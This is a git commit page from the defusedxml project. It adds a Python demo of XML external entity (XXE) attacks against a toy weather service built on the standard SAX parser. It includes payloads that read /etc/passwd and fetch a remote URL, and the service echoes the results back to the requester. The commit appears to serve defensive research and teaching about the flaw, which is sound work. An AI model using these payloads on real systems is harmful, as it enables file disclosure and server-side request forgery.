diff options
author | Christian Heimes <christian@python.org> | 2013-02-21 13:02:25 +0100 |
---|---|---|
committer | Christian Heimes <christian@python.org> | 2013-02-21 13:02:25 +0100 |
commit | 80df2598f046dbdd81ce8f2e72dcca66173c8b99 (patch) | |
tree | 2bbfb70d1b00597ba058a4017be7e3eceb771eed | |
parent | 42220e541960b395a06efd5e46f1bd4f6eabaf6b (diff) | |
download | defusedxml-git-80df2598f046dbdd81ce8f2e72dcca66173c8b99.tar.gz |
Add demo exploit for external entity expansion
-rwxr-xr-x | other/python-external.py | 58 |
1 files changed, 58 insertions, 0 deletions
diff --git a/other/python-external.py b/other/python-external.py new file mode 100755 index 0000000..2d0af47 --- /dev/null +++ b/other/python-external.py @@ -0,0 +1,58 @@ +#!/usr/bin/python +"""Demo exploit for external entity expansion +""" +import sys +from xml.sax import ContentHandler +from xml.sax import parseString + +xml_good = """<weather>Aachen</weather>""" + +xml_bad_file = """<?xml version="1.0" encoding="utf-8"?> +<!DOCTYPE weather [ +<!ENTITY passwd SYSTEM "file:///etc/passwd"> +]> +<weather>&passwd;</weather> +""" + +xml_bad_url = """<?xml version="1.0" encoding="utf-8"?> +<!DOCTYPE weather [ +<!ENTITY url SYSTEM "http://hg.python.org/cpython/raw-file/a11ddd687a0b/Lib/test/dh512.pem"> +]> +<weather>&url;</weather> +""" + + +class WeatherHandler(ContentHandler): + def __init__(self): + ContentHandler.__init__(self) + self.tag = "unseen" + self.city = [] + + def startElement(self, name, attrs): + if name != "weather" or self.tag != "unseen": + raise ValueError(name) + self.tag = "processing" + + def endElement(self, name): + self.tag = "seen" + self.city = "".join(self.city) + + def characters(self, content): + if self.tag == "processing": + self.city.append(content) + + +def weatherResponse(xml): + handler = WeatherHandler() + parseString(xml, handler) + if handler.city == "Aachen": + return "<weather>The weather in %s is terrible.</weather" % handler.city + else: + return "<error>Unknown city %s</error>" % handler.city[:500] + +for xml in (xml_good, xml_bad_file, xml_bad_url): + print("\nREQUEST:\n--------") + print(xml) + print("\nRESPONSE:\n---------") + print(weatherResponse(xml)) + print("") |